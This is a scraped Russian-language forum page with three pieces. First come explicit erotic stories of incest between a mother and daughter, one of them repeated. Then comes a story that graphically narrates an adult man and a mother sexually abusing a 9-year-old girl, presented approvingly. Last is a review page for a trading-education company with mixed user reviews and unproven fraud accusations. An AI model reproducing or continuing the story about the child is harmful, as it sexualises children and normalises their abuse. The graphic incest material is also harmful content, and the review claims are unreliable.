Скоро они скушали завтрак, Анжелика пошла мыть посуду, а мама заправляла постель. На маме была все та же майка, а дочка одела белого цвета свободную рубашку, которая еле прикрывала ее киску, а сзади очень была видна попка. Мама довольно быстро управилась, и когда пришла на кухню, Анжелика все еще мыла посуду.

Мамочка подошла к ней сзади, села на корточки, и попка дочки была как раз напротив мамочки. Мать начала скользить язычком по внутренней стороне бедер. Это место нравилось и маме и дочке, поэтому они всегда уделяли внимание ему. Потом она перешла к влагалищу дочки, немного его полизав, она просто втянула кисочку дочки к себе в рот. Анжелика от удовольствия аж прогнулась. Ласкав дочь, мама теребила и свой клитор. После, мамочкин остренький язычок перешел к анусу дочки, а два длинных пальчика с изящными коготками вошли в киску Анжелики. Кончили они вдвоем. Мамочка заботливо слизывала Анжеликины соки с ее прекрасных ножек.

На дворе лето. Уже 8. 00.

- Мам, пошли в сад! - кричала Анжелика мамочке.

- Пошли! - послышались крики из другой комнаты.

- Только давай голышом. - дерзко улыбнулась дочь.

- Хм. Ну давай.

На улице было прохладно, как раз для подобной прогулки. Участок у Ирины Алексеевны был громадным, вокруг в радиусе полкилометра никто не жил. В участок входил водоем и огромный сад, усаженный различными сортами яблок, груш, персиков, винограда и многого другого.

Мать и дочь, держась за ручки, вышли на порог коттеджа. Ирина захватила с собой покрывало. Им тут же стало немного холодно, и их тела покрылись пупырышками. Трава была еще сырая, это очень ощущается голыми ножками девушек. Они шли вдвоем, наслаждаясь пением птиц и ярким светом Солнца и этим ощущением свежести, прохлады. Мама сорвала с деревьев несколько слив и персик. Наконец они дошли до одной из беседок. Мама расстелила покрывало на лавке и села. Анжелика, немного подумав, сказала:

- Мамочка, можно я сяду тебе на коленки?

- Конечно, киса.

Мама и дочка прекрасно устроились на лавочке, они несколько минут сидели и молчали.

- Хочешь сливу? - спросила мама

- Угу

Мать взяла в рот ягоду и повернулась к дочери. Поедание ягоды превратилось в нечто среднее между поцелуем и приемом пищи.

Мама откусила половинку другой сливы и прислонилась оставшейся половинкой к груди дочери. Анжелика вздрогнула. Мама нежно обвела грудь дочери сливой и приблизилась к соску. Он так же не остался без внимания. Мама начала облизывать блестящие, красивейшие груди дочери. Когда она дошла до соска, она его сначала втянула, потом начала нежно покусывать. Когда очаровательные сисечки были вылизаны, мама направила сливу прямо к писе дочери. Мама вымазала соком всю поверхность писечки, бедра и анус, а саму сливу засунула во влагалище Анжелики. Анжелика была очень возбуждена, и ее выделения смешались с соком. Мама тут же решила попробовать на вкус это чудо. Анжелика села на стол и расставила ножки, а мамочка начала вылизывать ее там. Этот вкус был просто неповторимым.

- Анжелика, хочешь? - сказала мама, показывая дочери влажные пальчики?

- Да-а-а, конечно м-м-м-мамочка, я тебя обожаю.

Когда мама вылизала все у Анжелики, она полезла язычком в лоно дочери. Там томилась сочная слива. Языком ее не достать, и мама сделала это двумя пальчиками. В этот момент дочь бурно кончила. В очередной раз вылизав выделения, мама и дочь съели, наверное, самую вкусную в мире сливу.

Когда Ирина Алексеевна и Анжелика вернулись в дом, было уже около 12. 00.

Они зашли в душевую кабинку и помыли друг дружку, сильно не придаваясь утехам.

Вышли они, обернутые в большие, махровые полотенца. Они легли на кровать, повернувшись друг к другу лицом.

- Анжелика, надо срочно за продуктами съездить. Ты поедешь?

- Ай, мам, давай завтра.

- Ну Анжелика. Мне одной так скучно. Ну что мне для тебя сделать?

- Мам, я хочу в попку, ну пожалуйста.

- Ну неужели ты не понимаешь, что я это для тебя делаю? Она у тебя такая сладенькая, я не хочу, что бы твоя дырочка стала большой.

- А ты уже ебалась и у тебя тоже не большая!

- Ну ладно, котик, только когда приедем, тогда и попробуем.

Когда они собрались, было около 14. 00. До города ехать около получаса. Анжелика надела узенькую джинсовую юбочку и маечку, мама - красивое платье выше колена. Наконец послышался гул двигателя автомобиля, и Анжелика вместе с мамой покинули особняк. Ехать было скучно, и Анжелика полезла изящной лодыжкой маме между ног. От неожиданности Ирина вздрогнула и машину кивнуло в сторону.

- Анжелика! Вот неугомонная, неужели тебе все мало?

- Ну все равно делать нечего, я хочу ее просто потрогать.

- Не надо, ты мне мешаешь.

- Ну я чуть-чуть.

Анжеликина рука вновь оказалась между ног мамы. Сначала Анжелика просто гладила, а потом вошла одним пальчиком в мамину промежность. Маме бесспорно... стало это нравиться и она стала тихо постанывать. Потом Анжелика на миг высунула руку и облизала средний пальчик. Этим пальчиком она уперлась в анус мамы, но на этом не стала останавливаться. Да, она вошла в мамину попку, а второй пальчик вошел во влагалище зрелой женщины.

Несколько движений и мать бурно кончила и, не контролируя себя, втопила педаль газа что было сил. Анжелика очень испугалась и тут же убрала руку прочь. Оргазм у Ирины Алексеевны был не долгим, ее дыхание выровнялось, и скорость автомобиля уменьшилась. В машине воцарилась абсолютная тишина.

- Кстати, а почему ты без трусиков? - решила прервать тишину Анжелика

Мама посмотрела на себя и со смехом сказала:

- Это ж надо забыла. А у тебя собственно есть?

Анжелика задумалась, потом нырнула рукой под юбку и со смехом произнесла:

- Блин, тоже нет.

Они хихикали всю дорогу.

Вскоре приехали в магазин, и довольно долго закупались продуктами.

Анжелика очень долго выбирала огурец, которым собралась трахать свою попку. Она стояла там, где людей почти не было и мама решила отомстить маленькой лесбиянке. Она подошла к дочке, взяла широкий, но короткий огурец и резко сунула в нежную киску дочки. Анжелика аж взвыла от таких ощущений. Крик Анжелики привлек посетителей магазина и на нее стали глазеть. Мама взяла дочь за руку и повела к кассе. Но Анжелике очень не хотелось идти, ведь в ее маленькой писе торчал огурец. Она покрылась потом, покраснела, но терпеть надо было, она уже с мамой стояла в очереди.

Когда мама и дочь вышли из магазина, Анжелика мигом залезла в машину, взяла огурец в руку и начала им двигать туда-сюда с бешеной скоростью. Она кончила так, что от ее крика чуть стекла в машине не вынесло. Ирина лишь наблюдала с иронией за своей дочерью.

В магазине провели много времени, день подходил к концу и две очаровательные девушки на закате дня возвращались домой.

Проезжая мимо озера мама сказала:

- Слушай, давай искупнемся, вода должна быть просто горячей

- Конечно, пошли

Машину Ирина остановила около самого берега. Девочки вышли и разделись. Они взялись за руки и пошли в воду. Медленно, но верно они дошли до уровня плеч. Они обнялись и их груди прикоснулись, они начали нежно целоваться. Анжелика поставила свою ножку между мамиными, и мама сделала аналогично. Прошло немного времени и они кончили, тихо, красиво. Им больше ничего в мире не нужно, они стали одним целым. Так они простояли довольно долго, потом, немножко поплавав, они стали собираться домой. За весь день девушки очень устали и мигом заснули.

© Ирина Т.

Wima

0

15

Ilar

Анжелика и мама Ирина Алексеевна

(Все имена и события вымышлены, любые совпадения случайны)

Анжелика проснулась оттого, что у нее в промежности было очень жарко. Это ее мамочка с удовольствием облизывала писечку дочери. Влажные от смазки губки Анжеликиной писечки раскрылись и просто не могли устоять перед маминым язычком. Заботливая мамочка начала погружать свой горячий язычок внутрь, потом она перешла выше и начала засасывать уже набухший клитор дочери. Анжелика была уже на грани, весь дом наполнился сладкими стонами оргазма, и дочь наконец-то кончила.

Так начиналось каждое утро в доме Анжелики и ее мамы - Туйзаровой Ирины Алексеевны. Они очень любили доставлять друг дружке удовольствие. Мама и дочь договорились, что когда кто-то из них проснется первее, сразу же вылизывает писечку. Они не упускали возможность сделать приятно друг дружке. Мамочка и доченька занимались этим везде: в кровати, на коридоре, в ванной, на улице, на пороге возле дома, на балконе, на кухне и черт знает где еще.

Жили они крайне беззаботно и не ограничивали себя ни в чем.

Анжелика проснулась довольно рано. Было около 6.00. За окном только вставало солнышко, радостно пели птички. Озеро, которое находилось недалеко от дома, было тихим как никогда. На его поверхности клубился пар. Анжелика встала с кровати и смотрела на эту красоту несколько минут. Мама еще спала и Анжелика подумала, что сейчас самое время сделать ей приятно. Мамочка лежала на животе, ее очаровательные ножки были немного раздвинуты, как будто готовы к тому, что сейчас должно произойти. Анжелика откинула одеяло и прикоснулась своими розовыми губками к нежной маминой шее, потом аккуратно, кончиком язычка она опустилась до плеч. Потом она стала покрывать поцелуями спину матери и скоро дошла до сладких булочек.

Заботливая дочь немножко раздвинула мамину попку и провела горячим язычком между половинками, потом остановилась на анусе. Анальным сексом они занимались редко, поэтому дырочка у Ирины была очень тесная. Посверлив язычком мамину дырочку, дочь решила пойти дальше. Мамина киска уже горела, мясистые губки набухли и открыли вход во влагалище, с них уже начинал капать божественный сок, который сводил Анжелику с ума. Анжелика язычком сначала дотронулась внутренней стороны бедер мамочки и, облизав их, подошла к писе. Она слизала нависшие на маминой писе драгоценные капли, после чего отправила свой проворный язычок в лоно матери. До клитора языком достать было невозможно, поэтому Анжелике пришлось потрудиться. Мама кончила, и из ее киски вылилось большое количество жидкости. Анжелика с удовольствием вылизала мамку, потом пошла умываться.

Она решила сделать маме еще приятней и приготовила кофе с тостами. Когда она пришла в спальню, мама уже сидела на кровати у спинки. На маме была одета только коротенькая маечка. Мамочка сидела, аккуратно сдвинув стройные ножки, и улыбалась дочери

- Доброе утро, киса.

- Доброе утро, мам. Твоей писечке понравился мой язычок сегодня?

- Конечно, прелесть моя! Иди сюда.

Анжелика села на кровать, и поставила перед собой и мамой завтрак.

Они начали страстно целоваться, то взасос, то лишь касались друг дружку порхающими язычками.

- Котик, я тебя обожаю. - ласково сказала мать дочке

- Мамочка, я тебя тоже

Скоро они скушали завтрак, Анжелика пошла мыть посуду, а мама заправляла постель. На маме была все та же майка, а дочка одела белого цвета свободную рубашку, которая еле прикрывала ее киску, а сзади очень была видна попка. Мама довольно быстро управилась, и когда пришла на кухню, Анжелика все еще мыла посуду.

Мамочка подошла к ней сзади, села на корточки, и попка дочки была как раз напротив мамочки. Мать начала скользить язычком по внутренней стороне бедер. Это место нравилось и маме и дочке, поэтому они всегда уделяли внимание ему. Потом она перешла к влагалищу дочки, немного его полизав, она просто втянула кисочку дочки к себе в рот. Анжелика от удовольствия аж прогнулась. Ласкав дочь, мама теребила и свой клитор. После, мамочкин остренький язычок перешел к анусу дочки, а два длинных пальчика с изящными коготками вошли в киску Анжелики. Кончили они вдвоем. Мамочка заботливо слизывала Анжеликины соки с ее прекрасных ножек.

На дворе лето. Уже 8. 00.

- Мам, пошли в сад! - кричала Анжелика мамочке.

- Пошли! - послышались крики из другой комнаты.

- Только давай голышом. - дерзко улыбнулась дочь.

- Хм. Ну давай.

На улице было прохладно, как раз для подобной прогулки. Участок у Ирины Алексеевны был громадным, вокруг в радиусе полкилометра никто не жил. В участок входил водоем и огромный сад, усаженный различными сортами яблок, груш, персиков, винограда и многого другого.

Мать и дочь, держась за ручки, вышли на порог коттеджа. Ирина захватила с собой покрывало. Им тут же стало немного холодно, и их тела покрылись пупырышками. Трава была еще сырая, это очень ощущается голыми ножками девушек. Они шли вдвоем, наслаждаясь пением птиц и ярким светом Солнца и этим ощущением свежести, прохлады. Мама сорвала с деревьев несколько слив и персик. Наконец они дошли до одной из беседок. Мама расстелила покрывало на лавке и села. Анжелика, немного подумав, сказала:

- Мамочка, можно я сяду тебе на коленки?

- Конечно, киса.

Мама и дочка прекрасно устроились на лавочке, они несколько минут сидели и молчали.

- Хочешь сливу? - спросила мама

- Угу

Мать взяла в рот ягоду и повернулась к дочери. Поедание ягоды превратилось в нечто среднее между поцелуем и приемом пищи.

Мама откусила половинку другой сливы и прислонилась оставшейся половинкой к груди дочери. Анжелика вздрогнула. Мама нежно обвела грудь дочери сливой и приблизилась к соску. Он так же не остался без внимания. Мама начала облизывать блестящие, красивейшие груди дочери. Когда она дошла до соска, она его сначала втянула, потом начала нежно покусывать. Когда очаровательные сисечки были вылизаны, мама направила сливу прямо к писе дочери. Мама вымазала соком всю поверхность писечки, бедра и анус, а саму сливу засунула во влагалище Анжелики. Анжелика была очень возбуждена, и ее выделения смешались с соком. Мама тут же решила попробовать на вкус это чудо. Анжелика села на стол и расставила ножки, а мамочка начала вылизывать ее там. Этот вкус был просто неповторимым.

- Анжелика, хочешь? - сказала мама, показывая дочери влажные пальчики?

- Да-а-а, конечно м-м-м-мамочка, я тебя обожаю.

Когда мама вылизала все у Анжелики, она полезла язычком в лоно дочери. Там томилась сочная слива. Языком ее не достать, и мама сделала это двумя пальчиками. В этот момент дочь бурно кончила. В очередной раз вылизав выделения, мама и дочь съели, наверное, самую вкусную в мире сливу.

Когда Ирина Алексеевна и Анжелика вернулись в дом, было уже около 12. 00.

Они зашли в душевую кабинку и помыли друг дружку, сильно не придаваясь утехам.

Вышли они, обернутые в большие, махровые полотенца. Они легли на кровать, повернувшись друг к другу лицом.

- Анжелика, надо срочно за продуктами съездить. Ты поедешь?

- Ай, мам, давай завтра.

- Ну Анжелика. Мне одной так скучно. Ну что мне для тебя сделать?

- Мам, я хочу в попку, ну пожалуйста.

- Ну неужели ты не понимаешь, что я это для тебя делаю? Она у тебя такая сладенькая, я не хочу, что бы твоя дырочка стала большой.

- А ты уже ебалась и у тебя тоже не большая!

- Ну ладно, котик, только когда приедем, тогда и попробуем.

Когда они собрались, было около 14. 00. До города ехать около получаса. Анжелика надела узенькую джинсовую юбочку и маечку, мама - красивое платье выше колена. Наконец послышался гул двигателя автомобиля, и Анжелика вместе с мамой покинули особняк. Ехать было скучно, и Анжелика полезла изящной лодыжкой маме между ног. От неожиданности Ирина вздрогнула и машину кивнуло в сторону.

- Анжелика! Вот неугомонная, неужели тебе все мало?

- Ну все равно делать нечего, я хочу ее просто потрогать.

- Не надо, ты мне мешаешь.

- Ну я чуть-чуть.

Анжеликина рука вновь оказалась между ног мамы. Сначала Анжелика просто гладила, а потом вошла одним пальчиком в мамину промежность. Маме бесспорно... стало это нравиться и она стала тихо постанывать. Потом Анжелика на миг высунула руку и облизала средний пальчик. Этим пальчиком она уперлась в анус мамы, но на этом не стала останавливаться. Да, она вошла в мамину попку, а второй пальчик вошел во влагалище зрелой женщины.

Несколько движений и мать бурно кончила и, не контролируя себя, втопила педаль газа что было сил. Анжелика очень испугалась и тут же убрала руку прочь. Оргазм у Ирины Алексеевны был не долгим, ее дыхание выровнялось, и скорость автомобиля уменьшилась. В машине воцарилась абсолютная тишина.

- Кстати, а почему ты без трусиков? - решила прервать тишину Анжелика

Мама посмотрела на себя и со смехом сказала:

- Это ж надо забыла. А у тебя собственно есть?

Анжелика задумалась, потом нырнула рукой под юбку и со смехом произнесла:

- Блин, тоже нет.

Они хихикали всю дорогу.

Вскоре приехали в магазин, и довольно долго закупались продуктами.

Анжелика очень долго выбирала огурец, которым собралась трахать свою попку. Она стояла там, где людей почти не было и мама решила отомстить маленькой лесбиянке. Она подошла к дочке, взяла широкий, но короткий огурец и резко сунула в нежную киску дочки. Анжелика аж взвыла от таких ощущений. Крик Анжелики привлек посетителей магазина и на нее стали глазеть. Мама взяла дочь за руку и повела к кассе. Но Анжелике очень не хотелось идти, ведь в ее маленькой писе торчал огурец. Она покрылась потом, покраснела, но терпеть надо было, она уже с мамой стояла в очереди.

Когда мама и дочь вышли из магазина, Анжелика мигом залезла в машину, взяла огурец в руку и начала им двигать туда-сюда с бешеной скоростью. Она кончила так, что от ее крика чуть стекла в машине не вынесло. Ирина лишь наблюдала с иронией за своей дочерью.

В магазине провели много времени, день подходил к концу и две очаровательные девушки на закате дня возвращались домой.

Проезжая мимо озера мама сказала:

- Слушай, давай искупнемся, вода должна быть просто горячей

- Конечно, пошли

Машину Ирина остановила около самого берега. Девочки вышли и разделись. Они взялись за руки и пошли в воду. Медленно, но верно они дошли до уровня плеч. Они обнялись и их груди прикоснулись, они начали нежно целоваться. Анжелика поставила свою ножку между мамиными, и мама сделала аналогично. Прошло немного времени и они кончили, тихо, красиво. Им больше ничего в мире не нужно, они стали одним целым. Так они простояли довольно долго, потом, немножко поплавав, они стали собираться домой. За весь день девушки очень устали и мигом заснули.

© Ирина Т.

Egixo

0

16

Qijume

Соседка снизу

(Все совпадения с реальными людьми и событиями случайны)

Я переехал в этот дом за пару месяцев до всех этих событий. Пока мы с приятелем таскали вещи и немногочисленную мебель, я заметил молодую красивую женщину, которая вышла из подъезда с девочкой лет 8-10 и, улыбнувшись, прошла мимо нас.

Я машинально поздоровался и как-то забыл о ней.

Но вот в один из июльских вечеров я сидел и работал за компьютером, как вдруг раздался звонок в дверь. Я нехотя встал и пошел открывать. На пороге стояла та самая женщина, которую я видел в день переезда. Она смущенно улыбнулась и обратилась ко мне:

- Добрый вечер! Я Ирина.. Ирина Туйзарова, ваша соседка снизу. Моя дочка уронила телефон и теперь он не работает, а мне нужно срочно позвонить.

Мы с ней разговорились. Её звали Ирина, она была разведена и жила вдвоём с 9-ти летней дочкой Анжеликой.

Ирина пригласила меня в гости и мы просидели с ней до поздней ночи. Анжелика уже спала, когда мы целуясь плюхнулись в большое кресло. Я стал раздевать Ирину, готовый взорваться от неимоверного возбуждения, а она тихо постанывала. Сняв с неё одежду я начал целовать её груди, которые мгновенно напряглись, став твердыми. Её темные соски торчали, тело горело огнем, пальцы вцепились в подлокотники кресел. Целуя её живот я опускался все ниже и стянув с неё тонкие кружевные трусики прикоснулся языком к влажным горячим губкам. Она вскрикнула, по телу пробежала дрожь, а я засунул свой язык так глубоко, как только мог.

- Пойдём на кровать, - сказала она.

- Но мы же разбудим Анжелику, - возразил я.

А Анжелика уже проснулась от нашей возни и Ирининых стонов и теперь смотрела на нас сонными глазами.

Только тут до меня дошло, что мы сидим голые.

- Мам, можно я с вами? - спросила она.

У меня отвисла челюсть, я не знал, что сказать.

Ирина обняла меня за плечи и сказала:

- Успокойся, она всё знает. Мы с ней часто ласкаем друг друга.

Анжелика встала, подошла к нам и дотронулась до моего члена.

- Такой горячий! - сказала она.

На ней были только трусики и я понял, что она тоже меня очень возбуждает, хотя ей было всего девять лет и у неё даже ещё не начали расти груди.

Ирина легла на кровать и раздвинула ноги. Её выбритая киска была вся мокрая.

- Снимай трусики, - сказала она дочке, - давай покажем ему что мы умеем.

Анжелика сняла трусы и, встав на колени перед кроватью, начала лизать киску своей маме. Её маленькая, но круглая попка была прямо передо мной.

- Ну давай же, - простонала Ирина, - поласкай Анжелику.

Девочка действительно знала, что и как нужно делать. Через пару минут Ирина прогнулась и завыла от оргазма.

И тут я взорвался. Я схватил Анжелику, положил её на кровать рядом с Ириной, раздвинул ей ножки и впился языком в её маленькую писю. Я лизал её, целовал, сосал, а она тихо попискивала и изгибалась как пружина. Потом она встала на четвереньки и я начал лизать ей попку. Её попка была кругленькая и упругая. Я послюнявил палец и всунул ей в попку. Она ахнула и я стал двигать им и вращать, а Ирина ласкала пальчиком её писю. Потом она вышла и вернулась с тюбиком детского крема.

- Сделай всё по-настоящему, - сказала она, - мы уже пробовали с вибратором.

Она смазала мой член кремом и я медленно стал вставлять его Анжелике в попку. Девочка вскрикнула, но тут же подалась ко мне всем телом, насаживаясь на мой член.

Я стал двигаться в ней, а она громко стонала и теребила пальчиками свою писю. Меня захлестнула волна дикого оргазма и я стал изливать сперму прямо в неё, а потом повалился на кровать. Такого оргазма я не получал за всю свою жизнь.

Ирина с Анжеликой пошли в ванную, а я лежал не в силах подняться. Но когда они вернулись, я почувствовал, что мой член опять втал и пульсирует. Анжелика нагнулась и обхватив его губами стала сосать. А Ирина, игриво повиляв попкой сказала:

- А теперь меня!

Я резко вошел в неё и стал с остервенением её трахать. Перед глазами у меня плыли круги и я даже не заметил, как она кончила. Но мне надо было ещё и я поставив её на четвереньки стал трахать её в попку. Анжелика легла перед мамой на спину и Ирина стала лизать ей писю.

Мы с Анжеликой кончили почти одновременно.

Спать мы легли только под утро, а на следующий день я перетащил свои вещи к Ирине. Через месяц у нас свадьба. Свою первую брачную ночь мы проведем втроем.

(c) Смирнов А.В., 07.03.2014

Otono

0

17

Hello. And Bye.

0

18

Центр Биржевых Технологий
2.3  (24)

Контактные данные
Сайт компании: cbt.center;
Телефон поддержки: 0800500222;
Адрес головного офиса: Украина, ул. Героев Майдана 154, Черновцы;
Электронная почта: .
О компании
Проект ЦБТ занимается обучением трейдеров, и предоставляет услуги удаленного консалтинга по вопросам финансовых рынков, торгов, финансовых инструментов, инвестирования.

Центр Биржевых Технологий открылся в 2015 году, с 2018 года компания занимается дистанционный образованием, так что теперь не только жители Украины могут стать студентами ЦБТ. Сервис предлагает, как групповое, так и индивидуальное обучение по собственным технологиям.

Кроме того, центр активно занимается благотворительностью, и получил широкое освещение в сети благодаря акциям по защите прав людей на территории Восточной Украины.

Условия обучения
Студенты Центра Биржевых Технологий могут выбрать один из вариантов программы:

CBT Belastium — 10 дней занятий, готовая успешная финансовая модель заработка на торгах.
VIP CBT Belastium — такие же условия, как для CBT Belastium, только работа ведется 1 на 1 с преподавателем.
Доходная стратегия рассчитана на небольшие начальные вложения трейдера. Вебинары проходят в режиме реального времени. Студент может задавать вопросы преподавателю по ходу занятия.

Курсы помогут быстро вникнуть в торговлю валютными и криптовалютными активами, акциями, ETF, работу с контрактами на разницу цен.

Дополнительные услуги
Кроме непосредственного обучения трейдингу, Центр Биржевых Технологий предлагает и другие услуги:

финансовое консультирование для действующих трейдеров;
страхование вкладов по системам JPMorgan, Berkshire Hathaway, American International Group;
доступ к авто-торговле;
консалтинг по вопросам создания портфеля, рекомбиновки, работе с инвестиционными фондами.
Заключение
Вы найдете много отзывов о Центре Биржевых Технологий, некоторые из них можно почитать в комментариях ниже. Если вы проходили обучение, или сотрудничали с компанией — обязательно оставьте свой отзыв.

24 Отзыва про Центр Биржевых Технологий

Отличный сервис как оказалось
1980 Сентябрь 9, 2020
Честно говоря, был полон скепсиса, когда еще не начал консультироваться у этих ребят. Смущало то, что в любой момент могли потребоваться вложения, помимо оплаты за обучение. А к этому я не был готов. Но мне открыли демо-счет в личном кабинете и на его примере показывали все перемещения по финансам. У меня вообще был нулевой уровень, сомневался, стоит ли тратить время на ознакомление с торговлей финансовыми инструментами. Специалисты, что называется, разжевали все так, чтобы даже я понял. Вообще давно хотел попробовать себя в работе с финансами. Был еще вариант с банковскими вкладами. Но проценты совсем не радовали. Да и от меня там ничего не зависело. Максимум, что требовалось от меня – выбрать вид вклада. А условия и проценты банк диктовал уже сам. Я хотел делать что-то такое, в чем могу полноценно принимать участие. И работа с трейдинговыми биржами – это то, что нужно. Всем советую посетить данные курсы, даже если вы совсем ничего не понимаете в этом. Научат всех, даже совсем уж новичков.

Ответить

Лучше бы я эти деньги вложить себе на счет
kaspersky9 Октябрь 3, 2020
Я уже реально думаю, что лучше было бы оставить те деньги, которые я потратил на обучение во что-то полезное. В итоге я приобрел курсы, которые по итогу должны были мне дать реально крутую информацию и про современные инструменты и про торговлю и про риски. Но все, что предоставили мне спикеры я и так знал, а ничего нового так и не вынес для себя.

Ответить

Не оправдали они моих ожиданий
Diksi123 Октябрь 16, 2020
Я недавно наслушалась о пользе самообразования как круто проходить курсы и ни в чем потом себе не отказывать. Якобы вот послушаешь какие-то уроки и можешь свободно идти работать сам на себя. Только все это сказки, никто вам так просто золотую жилу не подарит и просто так не отдаст. Вот с ЦБТ та же история. много слов про них пишут и какие они крутые и что из долговой ямы способны вытащить, но правды в это действительно мало.

Ответить

Не покупайте у них курсы
borkhanin Октябрь 30, 2020
Была у меня мечта — начать работать самостоятельно, слухов про то, что так можно больше заработать действительно много. Но мне кажется, что это просто лапша, которую уже пихают везде где только можно. Сервис ужасный, они не могут даже нормально предоставить данные, о чем еще говорить.

Ответить

Вещает сайт, конечно, красиво
Кокс Ноябрь 1, 2020
Все рассчитано в Центре Биржевых Технологий на то, чтобы заманить в свои сети как можно больше наивных людей, желающих обучиться всему и сразу в короткие сроки. Причем для обучения не нужно покидать стен родного дома, достаточно просто включить компьютер и якобы сейчас там вас всему научат. Люди ведутся на красивую рекламу, совершенно не задумываясь о том, что они могут остаться и без денег, и без знаний. Ну что ж, лох не мамонт, не вымрет. Я просто обомлел, когда узнал, что руководитель организации – не такой уж простой человек. От него есть пострадавшие не только в финансовом плане. Своих работников он держит в ежовых рукавицах и заставляет каждый месяц отрабатывать жесткий план продаж. А вот если сотрудник в него не укладывается, то руководитель ЦБТ вполне может запугивать сотрудника, подослать ему «гонцов» и запугать с помощью грубой физической силы. И потом сделать так, что бедолага еще и должен останется. Вы все еще хотите отдавать свои деньги таким людям? А тем, кто их так нахваливает, хочу передать, что радоваться рановато. Сначала примените эти знания на практике, а потом будем говорить о пользе продаваемых ими курсов.

Ответить

Остался недоволен этой организацией
Miron Ноябрь 7, 2020
Встречал отзывы о Центре Биржевых Технологий, возвещающие о том, что здесь можно поставить на ноги даже полного профана, который ничегошеньки не понимает. Но все это полная брехня. Если вы никогда раньше не занимались трейдингом, вам тут Америку не откроют и вы точно не прозреете. Да, не спорю, встречалась и полезная информация. Но как только, спустя время, ты доходишь до нее умом, понимаешь, что применить ее на практике никак не сможешь. Потому что, опять же, практики нет совсем, если ты новичок. Специалисты компании не будут держать тебя за ручку и вместе с тобой совершать первые твои шаги в этой области. Рисковать придется самому, причем своими же деньгами. Я просто зря потратил деньги, купил даже не один, а несколько курсов. И с каждым новым курсом все надеялся, что вот-вот все пойму. Чуда не случилось, поэтому хочу предостеречь остальных. К тому же большая часть информации, которую они подают как нечто уникальное, можно спокойно найти в свободном доступе в интернете, совершенно бесплатно.

Ответить

Обучение было не особо нужно, но спасибо за результат
al-ba Ноябрь 24, 2020
Я обратилась сюда за помощью два года назад. Мне это особо было не нужно, просто захотелось освоить что-то новенькое. Понравилось, что могу проходить обучение дома, не выезжая никуда. Имея дома грудного ребенка, было бы сложно уделять время еще и на поездки на дополнительные курсы. А тут открыла для себя Центр Биржевой Торговли, где можно получать новые знания дистанционно. Кое-какие вопросы у меня возникают и по настоящее время. Невозможно изучить вообще все в деле трейдинга, все меняется и появляются разные новшества. Поэтому радует, что в любой момент я могу написать одному из специалистов и задать вопрос. Радует, что они берутся обучать не только тех, кто уже работает на этом поприще, но даже тех, кто пришел в этот бизнес с нуля и горит желанием чему-нибудь научиться. Хотя не скрою, что многие вещи я не поняла до сих пор, ну не даются они мне. Тут дело даже не в обучающих людях, а в том, что к чему-то есть способности, а к чему-то нет. Вот к примеру распознавание отбоев и пробоев для меня практически темный лес. Но я не унываю, если что, всегда можно уточнить детали в Центре.

Ответить

Попробуйте сами у них курс и убедитесь в моих словах
Irinaok Декабрь 24, 2020
Я начинал с того, что хотелось заниматься трейдингом и цель моя была сначала пройти хотя бы обучение и только потом начинать уже торговать. Соваться туда, где я даже ничего не смыслю — толку ноль. Вот я и купил курсы Центра Биржевых Технологий по совету знатоков в интернете и понял, что деньги просто выброшены на ветер. Даже не знаю, что лучше, купить бесполезный курс и слушать лапшу, которую на уши вешают или реально потратиться на брокера и все слить. Со второго мне кажется, что пользы будет больше.

Ответить

Мне хочется верить, что компания помогла многим
ageniy Декабрь 26, 2020
Мне действительно помогли не только их советы или программы по обучению, но и личные беседы, личные наставления от спикеров. Видно сразу, невооруженным взглядом, что стараются преподнести нам толковую информацию из уст своего же опыта и своих ошибок. Мы часто разбирались практическую информацию, старались разбирать кейсы. Спасибо им большое.

Ответить

Мне видимо просто повезло встретить такую компанию
Walter Z Декабрь 30, 2020
Часто слышал про них в интернете до момента пока сам не решил обратиться за помощью и советом. Мне порекомендовали пройти курс. Скажу сразу, что он реально стоит тех денег, которые я за него отдал. Приятная и легко инфа, которую я быстро усвоил и уже сразу прошел проверять на практике. Все сработало как по часам и вот сейчас я практически уже накопил себе на квартиру. Спасибо ЦБТ!

Ответить

Смысла траты времени и денег нет
users1 Январь 14, 2021
Зайдя на сайт, мы можем видеть, как эти люди предлагают нам обучиться с нуля работе с финансовыми рынками. Работники, называемые менеджерами и аналитиками, не работают с вами напрямую. Те, кто потом с вами контактирует, это черные брокеры, мошенники еще похлеще Центра Биржевых Технологий. Задача менеджера только в том, чтобы втюхать вам этот курс. Дальше уже ваши контакты передаются тем самым «брокерам». Их задача – не помочь вам, а вытрясти как можно больше денег. Причем совершенно не важно, с чем вы после этого останетесь, с долгами или с пустыми карманами. Я хотел найти какую-то информацию о проекте, которая опровергнет мое негативное мнение. Ну всякое бывает, есть же все-таки в нашем мире и честные курсы, руководители которых не ставят перед собой задачу обобрать клиента. Но на официальном сайте контактной информации, которая даст более-менее прозрачное представление о фирме, практически нет. А значит, что им не выгодно давать свои реальные данные. Кое-что мне все-таки удалось найти. Вкратце, я не удивлюсь, если ЦБТ скоро закроется, потому что на данный момент находится на этапе ликвидации. Да и большинство ссылок, которые ведут на сайт, перестают работать одна за другой.

Ответить

Безумно жалко время, которое я угрохал на освоение этой сферы бизнеса
Alecseinic Февраль 2, 2021
Если бы сам начал изучать трейдинг, уже давно бы занимался этим профессионально, в этом я больше, чем уверен. Ну и даже не буду упоминать суммы, за которые они продают свои курсы. Не понимаю, как я вообще повелся, ведь изначально интуиция подсказывала не вкладываться в это дело. Сказать, что якобы полезная информация, которую они вам продают, на самом деле бесполезная и гроша ломаного не стоит – это ничего не сказать. Но тем не менее, у них постоянно находятся новые клиенты и они почему-то не закрываются. Хотя логично предполагать, что даже если эти мошенники обанкротятся, то откроются заново, только уже под новым именем. И так до бесконечности. На этих курсах даются банальные определения, которые я и так знал. Курсы не систематизированы, то есть взяли по кусочку информации из каждой темы и напихали в один блок. Совсем не профессиональный подход, ребята. Никаких положительных сторон в этой теме я для себя не обнаружил. Теперь только и думаю, что о потраченных деньгах и напрасно убитом времени.

Ответить

Эх, люди, люди
unidrive Март 22, 2021
Не хочу я просто чтобы такие же чайники как и я велись на громкие заявления, что заработок в интернете это просто и что ему можно обучить кого угодно. Все это сказки и поверьте мне, такие компании просто рассказывают бред, общую информацию из гугла и не способны реально научить вас торговать, а не языком трепать.

Ответить

Цель благая и результат меня удовлетворяет
Хачатурян Март 27, 2021
